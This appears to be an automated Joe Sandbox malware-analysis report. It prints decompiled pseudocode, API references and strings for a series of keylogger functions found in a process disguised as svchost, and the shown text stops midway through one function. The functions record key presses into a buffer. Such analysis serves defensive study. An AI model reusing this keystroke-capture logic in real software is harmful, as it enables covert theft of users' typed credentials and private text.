MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Mode Change], xrefs: 00C85D04

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C85D13, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85D13(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Page Down]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Page Down], xrefs: 00C85D15

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C85B48, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85B48(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[F19]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[F19], xrefs: 00C85B4A

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C85CCF, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85CCF(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Play / Pause]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Play / Pause], xrefs: 00C85CD1

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C8588F, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C8588F(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Execute]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Execute], xrefs: 00C85891

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C85B7B, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85B7B(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[F21]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[F21], xrefs: 00C85B7D

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C85B26, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85B26(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[F17]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[F17], xrefs: 00C85B28
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C85CE0, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85CE0(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Previous Track]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
